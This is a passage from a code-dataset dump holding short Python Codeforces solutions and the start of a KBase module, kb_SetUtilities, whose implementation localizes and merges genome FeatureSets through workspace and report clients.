"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 10,
"path": "/watermelon.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "# https://codeforces.com/problemset/problem/4/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\nn = inp()\neven_numbers = [i for i in range(2,n) if i%2==0]\nprint('YES' if any(even_numbers) and n%2 == 0 else 'NO')"
},
{
"alpha_fraction": 0.5460993051528931,
"alphanum_fraction": 0.6241135001182556,
"avg_line_length": 22.5,
"blob_id": "1482bfbce51c7194fdea31624604fdf6f66e7e6f",
"content_id": "fc442cba5281031586586c4f6ef066da711946d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 6,
"path": "/wrong_subtraction.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/977/A\nn,k=map(int,input().split())\nwhile k > 0:\n n = n//10 if n%10 == 0 else n-1\n k-=1\nprint(n)\n"
},
{
"alpha_fraction": 0.6954545378684998,
"alphanum_fraction": 0.7181817889213562,
"avg_line_length": 23.44444465637207,
"blob_id": "3bab719483a04a341475233214c537033db945de",
"content_id": "248a5c6bb2ca99deddeb014a2355a9217dadc972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 9,
"path": "/boy_or_girl.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/236/A\n\nwords=input()\nunique_words=''\n\nfor word in words:\n if word not in unique_words: unique_words+=word\n\nprint('CHAT WITH HER!' if len(unique_words)%2==0 else 'IGNORE HIM!')\n"
}
] | 19 |
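Several solutions in the record above share the same fast-stdin helpers (inp/read_lines) and reduce to one pass over the input. As a worked illustration of the first file, tram.py is just a running sum of boardings minus exits with a maximum tracked along the way; a self-contained sketch (sample values hardcoded in place of stdin, taken from the Codeforces 116A statement):

def max_tram_capacity(stops):
    # stops holds (exited, entered) pairs, one per stop
    occupancy = 0
    peak = 0
    for exited, entered in stops:
        occupancy += entered - exited
        peak = max(peak, occupancy)
    return peak

# 116A sample: occupancy goes 3 -> 6 -> 4 -> 0, so the answer is 6
assert max_tram_capacity([(0, 3), (2, 5), (4, 2), (4, 0)]) == 6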
kbaseapps/kb_SetUtilities
|
https://github.com/kbaseapps/kb_SetUtilities
|
9cddb1b3c62c3f5a2c954f8598ad713afa58a2d1
|
1d093bc1c3b896a541b850cd57b606bdea70d066
|
0da195d072d07fe0f0de5bc4ee1f5cce56fad8a2
|
refs/heads/master
| 2023-07-28T16:05:01.153256 | 2021-09-14T18:52:40 | 2021-09-14T18:52:40 | 100,541,211 | 0 | 3 |
MIT
| 2017-08-16T23:30:11 | 2021-09-14T18:52:43 | 2023-09-13T05:06:00 |
Python
|
[
{
"alpha_fraction": 0.787564754486084,
"alphanum_fraction": 0.787564754486084,
"avg_line_length": 42,
"blob_id": "5bd347a5d07fa8dd8008d2853d5dac208c5c7699",
"content_id": "33d321154d9805fe3355b9dfc499e26c63874406",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 386,
"license_type": "permissive",
"max_line_length": 133,
"num_lines": 9,
"path": "/README.md",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/kbaseapps/kb_Setutilities)\n\n# kb_SetUtilities\n\n A module for set manipulation utilities. Most of these functions were formerly in kb_SetUtilities\n\n---\n\nThis is the basic readme for this module. Include any usage or deployment instructions and links to other documentation here."
},
{
"alpha_fraction": 0.5290688276290894,
"alphanum_fraction": 0.5303225517272949,
"avg_line_length": 46.42170333862305,
"blob_id": "1e9df3ad0c3cf2a6dde8b92234cbed1c7f2ccee9",
"content_id": "357205db8038bcfae6a4d48fc64b7045e7826c48",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 145964,
"license_type": "permissive",
"max_line_length": 202,
"num_lines": 3078,
"path": "/lib/kb_SetUtilities/kb_SetUtilitiesImpl.py",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#BEGIN_HEADER\nimport os\nimport re\nimport sys\nfrom datetime import datetime\nfrom pprint import pformat # ,pprint\n\nfrom installed_clients.KBaseReportClient import KBaseReport\nfrom installed_clients.SetAPIServiceClient import SetAPI\nfrom installed_clients.WorkspaceClient import Workspace as workspaceService\n#END_HEADER\n\n\nclass kb_SetUtilities:\n '''\n Module Name:\n kb_SetUtilities\n\n Module Description:\n ** A KBase module: kb_SetUtilities\n**\n** This module contains basic utilities for set manipulation, originally extracted\n** from kb_util_dylan\n**\n '''\n\n ######## WARNING FOR GEVENT USERS ####### noqa\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n ######################################### noqa\n VERSION = \"1.7.6\"\n GIT_URL = \"https://github.com/kbaseapps/kb_SetUtilities\"\n GIT_COMMIT_HASH = \"5d75bb3340d9a3b78f4b81d44f9ec0dc3b2195a9\"\n\n #BEGIN_CLASS_HEADER\n workspaceURL = None\n shockURL = None\n handleURL = None\n serviceWizardsURL = None\n callbackURL = None\n scratch = None\n\n def now_ISO(self):\n now_timestamp = datetime.now()\n now_secs_from_epoch = (now_timestamp - datetime(1970,1,1)).total_seconds()\n now_timestamp_in_iso = datetime.fromtimestamp(int(now_secs_from_epoch)).strftime('%Y-%m-%d_%T')\n return now_timestamp_in_iso\n\n def log(self, target, message):\n # target is a list for collecting log messages\n message = '['+self.now_ISO()+'] '+message\n if target is not None:\n target.append(message)\n print(message)\n sys.stdout.flush()\n\n def check_params (self, params, required_params):\n missing_params = []\n for param in required_params:\n if not params.get(param):\n missing_params.append(param)\n if len(missing_params):\n raise ValueError(\"Missing required param(s):\\n\" + \"\\n\".join(missing_params))\n\n def ws_fetch_error(self, obj_desc, obj_ref, error=None):\n msg = 'Unable to fetch '+obj_desc+' ref:'+ obj_ref + ' from workspace.'\n if error is not None:\n msg += ' Error: ' + str(error)\n raise ValueError(msg)\n\n def set_provenance (self, ctx, input_ws_obj_refs=[], service_name=None, method_name=None):\n if ctx.get('provenance '):\n provenance = ctx['provenance']\n else:\n provenance = [{}]\n # add additional info to provenance here, especially the input data object reference(s)\n if 'input_ws_objects' not in provenance[0]:\n provenance[0]['input_ws_objects'] = []\n if len(input_ws_obj_refs) > 0:\n provenance[0]['input_ws_objects'].extend(input_ws_obj_refs)\n if service_name is not None:\n provenance[0]['service'] = service_name\n if method_name is not None:\n provenance[0]['method'] = method_name\n return provenance\n\n def get_obj_name_and_type_from_obj_info (self, obj_info, full_type=False):\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n obj_name = obj_info[NAME_I]\n obj_type = obj_info[TYPE_I].split('-')[0]\n if not full_type:\n obj_type = obj_type.split('.')[1]\n return (obj_name, obj_type)\n\n def get_obj_ref_from_obj_info (self, obj_info):\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n return '/'.join([str(obj_info[WSID_I]),\n str(obj_info[OBJID_I]),\n str(obj_info[VERSION_I])])\n \n def 
get_obj_ref_from_obj_info_noVer (self, obj_info):\n        [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n        return '/'.join([str(obj_info[WSID_I]),\n                         str(obj_info[OBJID_I])])\n    \n    def get_obj_data (self, obj_ref, obj_type_desc, full_type=False):\n        obj_data = None\n        obj_info = None\n        obj_name = None\n        obj_type = None\n        try:\n            objects = self.wsClient.get_objects2({'objects': [{'ref': obj_ref}]})['data'][0]\n        except Exception as e:\n            self.ws_fetch_error(obj_type_desc+' object', obj_ref, error=e)\n        obj_data = objects['data']\n        obj_info = objects['info']\n        (obj_name, obj_type) = self.get_obj_name_and_type_from_obj_info (obj_info, full_type)\n        return (obj_data, obj_info, obj_name, obj_type)\n\n    def get_obj_info (self, obj_ref, obj_type_desc, full_type=False):\n        obj_info = None\n        obj_name = None\n        obj_type = None\n        try:\n            obj_info = self.wsClient.get_object_info_new ({'objects':[{'ref':obj_ref}]})[0]\n        except Exception as e:\n            self.ws_fetch_error(obj_type_desc+' object info', obj_ref, error=e)\n        (obj_name, obj_type) = self.get_obj_name_and_type_from_obj_info (obj_info, full_type)\n        return (obj_info, obj_name, obj_type)\n    \n    def get_obj_info_list_from_ws_id (self, ws_id, obj_type, obj_type_desc):\n        obj_info_list = []\n        try:\n            obj_info_list = self.wsClient.list_objects({'ids':[ws_id],'type':obj_type})\n        except Exception as e:\n            raise ValueError (\"Unable to list \"+obj_type_desc+\" objects from workspace: \"+str(ws_id)+\" \"+str(e))\n        return obj_info_list\n\n    def get_obj_info_list_from_ws_name (self, ws_name, obj_type, obj_type_desc):\n        obj_info_list = []\n        try:\n            obj_info_list = self.wsClient.list_objects({'workspaces':[ws_name],'type':obj_type})\n        except Exception as e:\n            raise ValueError (\"Unable to list \"+obj_type_desc+\" objects from workspace: \"+str(ws_name)+\" \"+str(e))\n        return obj_info_list\n    \n    #END_CLASS_HEADER\n\n    # config contains contents of config file in a hash or None if it couldn't\n    # be found\n    def __init__(self, config):\n        #BEGIN_CONSTRUCTOR\n        self.token = os.environ['KB_AUTH_TOKEN']\n        self.workspaceURL = config['workspace-url']\n        self.shockURL = config['shock-url']\n        self.serviceWizardURL = config['service-wizard-url']\n\n        self.callbackURL = os.environ.get('SDK_CALLBACK_URL')\n#        if self.callbackURL == None:\n#            self.callbackURL = os.environ['SDK_CALLBACK_URL']\n        if self.callbackURL is None:\n            raise ValueError(\"SDK_CALLBACK_URL not set in environment\")\n\n        self.scratch = os.path.abspath(config['scratch'])\n        if not os.path.exists(self.scratch):\n            os.makedirs(self.scratch)\n\n        # set test status for called modules\n        self.SERVICE_VER = 'release'\n\n        # instantiate clients\n        try:\n            self.wsClient = workspaceService(self.workspaceURL, token=self.token)\n        except Exception as e:\n            raise ValueError('Unable to connect to workspace at ' + self.workspaceURL + str(e))\n\n        try:\n            self.reportClient = KBaseReport(self.callbackURL, token=self.token, service_ver=self.SERVICE_VER)\n        except Exception as e:\n            raise ValueError('Unable to instantiate reportClient ' + str(e))\n\n        try:\n            self.setAPI_Client = SetAPI(url=self.serviceWizardURL, token=self.token, service_ver=self.SERVICE_VER)\n        except Exception as e:\n            raise ValueError('Unable to instantiate SetAPI' + str(e))\n        \n        #END_CONSTRUCTOR\n        pass\n\n\n    def KButil_Localize_GenomeSet(self, ctx, params):\n        \"\"\"\n        :param params: instance of type \"KButil_Localize_GenomeSet_Params\"\n           (KButil_Localize_GenomeSet() ** ** Method for creating Genome Set\n           with all 
local Genomes) -> structure: parameter \"workspace_name\"\n of type \"workspace_name\" (** The workspace object refs are of\n form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\"\n :returns: instance of type \"KButil_Localize_GenomeSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Localize_GenomeSet\n raise NotImplementedError\n #END KButil_Localize_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Localize_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Localize_FeatureSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Localize_FeatureSet_Params\"\n (KButil_Localize_FeatureSet() ** ** Method for creating Feature\n Set with all local Genomes) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n           parameter \"input_ref\" of type \"data_obj_ref\", parameter\n           \"output_name\" of type \"data_obj_name\"\n        :returns: instance of type \"KButil_Localize_FeatureSet_Output\" ->\n           structure: parameter \"report_name\" of type \"data_obj_name\",\n           parameter \"report_ref\" of type \"data_obj_ref\"\n        \"\"\"\n        # ctx is the context object\n        # return variables are: returnVal\n        #BEGIN KButil_Localize_FeatureSet\n        [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n        console = []\n        invalid_msgs = []\n        self.log(console, 'Running KButil_Localize_FeatureSet with params=')\n        self.log(console, \"\\n\" + pformat(params))\n        report = ''\n\n\n        # param checks\n        required_params = ['workspace_name',\n                           'input_ref'\n                           ]\n        self.check_params (params, required_params)\n\n\n        # read FeatureSet to get local workspace ID, source object name, and list of original genome refs\n        #\n        self.log (console, \"READING LOCAL WORKSPACE ID\")\n        src_featureSet_ref = params['input_ref']\n\n        (src_featureSet,\n         info,\n         src_featureSet_name,\n         type_name) = self.get_obj_data(src_featureSet_ref, 'featureSet')\n\n        if type_name != 'FeatureSet':\n            raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n        # Set local WSID from FeatureSet\n        local_WSID = str(info[WSID_I])\n\n\n        # read workspace to determine which genome objects are already present\n        #\n        genome_obj_type = \"KBaseGenomes.Genome\"\n        local_genome_refs_by_name = dict()\n        genome_obj_info_list = self.get_obj_info_list_from_ws_id(local_WSID,\n                                                                 genome_obj_type,\n                                                                 genome_obj_type)\n\n        for info in genome_obj_info_list:\n            genome_obj_ref = self.get_obj_ref_from_obj_info(info)\n            (genome_obj_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n            local_genome_refs_by_name[genome_obj_name] = genome_obj_ref\n\n\n        # set order for features list (src_featureSet was already unpacked above)\n        #\n        self.log (console, \"GETTING FEATURES ORDERING\")\n        src_element_ordering = []\n        if 'element_ordering' in list(src_featureSet.keys()):\n            src_element_ordering = src_featureSet['element_ordering']\n        else:\n            src_element_ordering = sorted(src_featureSet['elements'].keys())\n        logMsg = 'features in input set {}: {}'.format(src_featureSet_ref,\n                                                       len(src_element_ordering))\n        self.log(console, logMsg)\n        report += logMsg\n\n\n        # Standardize genome refs to numerical IDs\n        #\n        self.log (console, \"STANDARDIZING GENOME REFS\")\n        genome_ref_to_standardized = dict()\n        standardized_genome_refs = []\n        for fId in src_element_ordering:\n            for src_genome_ref in src_featureSet['elements'][fId]:\n                if src_genome_ref in genome_ref_to_standardized:\n                    pass\n                else:\n                    (src_genome_obj_info,\n                     src_genome_obj_name,\n                     src_genome_obj_type) = self.get_obj_info(src_genome_ref, 'genome', full_type=True)\n\n                    #acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseGenomeAnnotations.GenomeAnnotation\"]\n                    acceptable_types = [\"KBaseGenomes.Genome\"]\n                    if src_genome_obj_type not in acceptable_types:\n                        raise ValueError(\"Input Genome of type: '\" + src_genome_obj_type +\n                                         \"'. 
Must be one of \" + \", \".join(acceptable_types))\n\n standardized_src_genome_ref = self.get_obj_ref_from_obj_info(src_genome_obj_info)\n genome_ref_to_standardized[src_genome_ref] = standardized_src_genome_ref\n standardized_genome_refs.append(standardized_src_genome_ref)\n\n\n # Copy all non-local genomes to local workspace\n #\n self.log (console, \"COPYING NON-LOCAL GENOMES TO LOCAL WORKSPACE\")\n src2dst_genome_refs = dict()\n objects_created = []\n local_genome_cnt = 0\n non_local_genome_cnt = 0\n for src_genome_ref in standardized_genome_refs:\n this_WSID = str(src_genome_ref.split('/')[0])\n if this_WSID == local_WSID:\n src2dst_genome_refs[src_genome_ref] = src_genome_ref\n else:\n (src_genome_obj_data,\n src_genome_obj_info,\n src_genome_obj_name,\n type_name) = self.get_obj_data(src_genome_ref, 'genome')\n\n if src_genome_obj_name in local_genome_refs_by_name:\n src2dst_genome_refs[src_genome_ref] = local_genome_refs_by_name[src_genome_obj_name]\n local_genome_cnt += 1\n continue\n non_local_genome_cnt += 1\n\n # set provenance\n input_ws_obj_refs = [src_featureSet_ref, src_genome_ref]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Localize_FeatureSet')\n\n # Save object\n src_genome_obj_ref = self.get_obj_ref_from_obj_info(src_genome_obj_info)\n self.log(console, \"SAVING GENOME \"+src_genome_obj_ref+\" to workspace \"+str(params['workspace_name'])+\" (ws.\"+str(local_WSID)+\")\")\n dst_genome_obj_data = src_genome_obj_data\n (dst_genome_obj_name, type_name) = self.get_obj_name_and_type_from_obj_info (src_genome_obj_info)\n dst_genome_obj_info = self.wsClient.save_objects({\n 'workspace': params['workspace_name'],\n 'objects': [\n {\n 'type': 'KBaseGenomes.Genome',\n 'data': dst_genome_obj_data,\n 'name': dst_genome_obj_name,\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n dst_standardized_genome_ref = self.get_obj_ref_from_obj_info(dst_genome_obj_info)\n src2dst_genome_refs[src_genome_ref] = dst_standardized_genome_ref\n objects_created.append({'ref': dst_standardized_genome_ref,\n 'description': 'localized '+dst_genome_obj_name})\n\n\n # Build Localized FeatureSet with local genome_refs\n #\n if non_local_genome_cnt == 0 and local_genome_cnt == 0:\n self.log (console, \"NO NON-LOCAL GENOME REFS FOUND\")\n else:\n self.log (console, \"BUILDING LOCAL FEATURESET\")\n dst_featureSet_data = dict()\n dst_featureSet_data['desc'] = src_featureSet['desc']+' - localized'\n dst_featureSet_data['element_ordering'] = src_element_ordering\n dst_featureSet_data['elements'] = dict()\n for fId in src_element_ordering:\n dst_genome_refs = []\n for orig_src_genome_ref in src_featureSet[fId]:\n standardized_src_genome_ref = genome_ref_to_standardized[orig_src_genome_ref]\n dst_genome_refs.append(src2dst_genome_refs[standardized_src_genome_ref])\n dst_featureSet_data['elements'][fId] = dst_genome_refs\n\n\n # Overwrite input FeatureSet object with local genome refs\n dst_featureSet_name = src_featureSet_name\n\n # set provenance\n input_ws_obj_refs = [src_featureSet_ref]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Localize_FeatureSet')\n\n # save output obj\n dst_featureSet_info = self.wsClient.save_objects({\n 'workspace': params['workspace_name'],\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': dst_featureSet_name,\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n objects_created.append({'ref': params['workspace_name']+'/'+dst_featureSet_name,\n 
'description': 'localized FeatureSet'})\n\n\n        # build output report object\n        self.log(console, \"BUILDING REPORT\")\n\n        total_genomes_cnt = len(standardized_genome_refs)\n        if non_local_genome_cnt > 0 or local_genome_cnt > 0:\n            final_msg = []\n            final_msg.append(\"Total genomes in FeatureSet: \" + str(total_genomes_cnt))\n            final_msg.append(\"Non-local genomes copied over: \" + str(non_local_genome_cnt))\n            final_msg.append(\"Local genomes with remote references: \" + str(local_genome_cnt))\n            logMsg = \"\\n\".join(final_msg)\n            self.log(console, logMsg)\n            report += logMsg\n            reportObj = {\n                'objects_created': objects_created,\n                'text_message': report\n            }\n        else:\n            report += \"NO NON-LOCAL GENOMES FOUND. NO NEW FEATURESET CREATED.\"\n            reportObj = {\n                'objects_created': [],\n                'text_message': report\n            }\n\n        # Save report\n        report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n        returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n        self.log(console, \"KButil_Localize_FeatureSet DONE\")\n        #END KButil_Localize_FeatureSet\n\n        # At some point might do deeper type checking...\n        if not isinstance(returnVal, dict):\n            raise ValueError('Method KButil_Localize_FeatureSet return value ' +\n                             'returnVal is not type dict as required.')\n        # return the results\n        return [returnVal]\n\n    def KButil_Merge_FeatureSet_Collection(self, ctx, params):\n        \"\"\"\n        :param params: instance of type\n           \"KButil_Merge_FeatureSet_Collection_Params\"\n           (KButil_Merge_FeatureSet_Collection() ** ** Method for merging\n           FeatureSets) -> structure: parameter \"workspace_name\" of type\n           \"workspace_name\" (** The workspace object refs are of form: ** ** \n           objects = ws.get_objects([{'ref':\n           params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n           the entire name combining the workspace id and the object name **\n           \"id\" is a numerical identifier of the workspace or object, and\n           should just be used for workspace ** \"name\" is a string identifier\n           of a workspace or object. 
This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Merge_FeatureSet_Collection_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Merge_FeatureSet_Collection\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Merge_FeatureSet_Collection with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # param checks\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Merged FeatureSet'\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 2:\n self.log(console, \"Must provide at least two FeatureSets\")\n self.log(invalid_msgs, \"Must provide at least two FeatureSets\")\n\n # Build FeatureSet\n element_ordering = []\n elements = {}\n featureSet_seen = dict()\n feature_seen = dict()\n input_feature_cnt = dict()\n merged_feature_cnt = 0\n for featureSet_ref in params['input_refs']:\n if featureSet_ref not in list(featureSet_seen.keys()):\n featureSet_seen[featureSet_ref] = True\n input_feature_cnt[featureSet_ref] = 0\n else:\n self.log(console, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n self.log(invalid_msgs, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n continue\n\n (this_featureSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(featureSet_ref, 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n this_element_ordering = []\n if 'element_ordering' in list(this_featureSet.keys()):\n this_element_ordering = this_featureSet['element_ordering']\n else:\n this_element_ordering = sorted(this_featureSet['elements'].keys())\n logMsg = 'features in input set {}: {}'.format(featureSet_ref,\n len(this_element_ordering))\n self.log(console, logMsg)\n\n for fId in this_element_ordering:\n if not elements.get(fId):\n elements[fId] = []\n element_ordering.append(fId)\n for genome_ref in this_featureSet['elements'][fId]:\n input_feature_cnt[featureSet_ref] += 1\n unique_fId = genome_ref+'-'+fId\n if not feature_seen.get(unique_fId):\n elements[fId].append(genome_ref)\n merged_feature_cnt += 1\n feature_seen[unique_fId] = True\n report += 'features in input set ' + featureSet_ref + ': ' + str(\n input_feature_cnt[featureSet_ref]) + \"\\n\"\n \n # set provenance\n input_ws_obj_refs = params['input_refs']\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Merge_FeatureSet_Collection')\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING FEATURESET\")\n output_FeatureSet = {'description': params['desc'],\n 'element_ordering': element_ordering,\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n \n # build 
output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"features in output set \" + params['output_name'] + \": \"\n + str(merged_feature_cnt))\n report += 'features in output set ' + params['output_name'] + ': '\n report += str(merged_feature_cnt) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Merge_FeatureSet_Collection'}],\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Merge_FeatureSet_Collection DONE\")\n #END KButil_Merge_FeatureSet_Collection\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Merge_FeatureSet_Collection return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Slice_FeatureSets_by_Genomes(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Slice_FeatureSets_by_Genomes_Params\"\n (KButil_Slice_FeatureSets_by_Genomes() ** ** Method for Slicing a\n FeatureSet or FeatureSets by a Genome, Genomes, or GenomeSet) ->\n structure: parameter \"workspace_name\" of type \"workspace_name\" (**\n The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n parameter \"input_featureSet_refs\" of type \"data_obj_ref\",\n parameter \"input_genome_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Slice_FeatureSets_by_Genomes_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Slice_FeatureSets_by_Genomes\n console = []\n invalid_msgs = []\n self.log(console, 'Running Slice_FeatureSets_by_Genomes with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_featureSet_refs',\n 'input_genome_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced FeatureSet'\n\n\n # clean input_feature_refs\n clean_input_refs = []\n for ref in params['input_featureSet_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_featureSet_refs'] = clean_input_refs\n\n # clean input_genome_refs\n clean_input_refs = []\n for ref in params['input_genome_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_genome_refs'] = clean_input_refs\n\n\n # Standardize genome refs so string comparisons are valid (only do requested genomes)\n #\n genome_ref_to_standardized = dict()\n genome_ref_from_standardized_in_input_flag = dict()\n for this_genome_ref in params['input_genome_refs']:\n\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n \n acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseMetagenomes.AnnotatedMetagenomeAssembly\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. 
Must be one of \" + \", \".join(acceptable_types))\n\n this_standardized_genome_ref = self.get_obj_ref_from_obj_info(genome_obj_info)\n genome_ref_to_standardized[this_genome_ref] = this_standardized_genome_ref\n genome_ref_from_standardized_in_input_flag[this_standardized_genome_ref] = True\n\n\n # Build FeatureSets\n #\n featureSet_seen = dict()\n featureSet_genome_ref_to_standardized = dict() # have to map genome refs in featureSets also because might be mixed WS_ID-WS_NAME/OBJID-OBJNAME and not exactly correspond with input genome refs\n feature_list_lens = []\n objects_created = []\n\n for featureSet_ref in params['input_featureSet_refs']:\n if featureSet_ref not in list(featureSet_seen.keys()):\n featureSet_seen[featureSet_ref] = 1\n else:\n self.log(console, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n self.log(invalid_msgs, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n continue\n\n (this_featureSet,\n info,\n this_featureSet_obj_name,\n type_name) = self.get_obj_data(featureSet_ref, 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n this_element_ordering = []\n if 'element_ordering' in list(this_featureSet.keys()):\n this_element_ordering = this_featureSet['element_ordering']\n else:\n this_element_ordering = 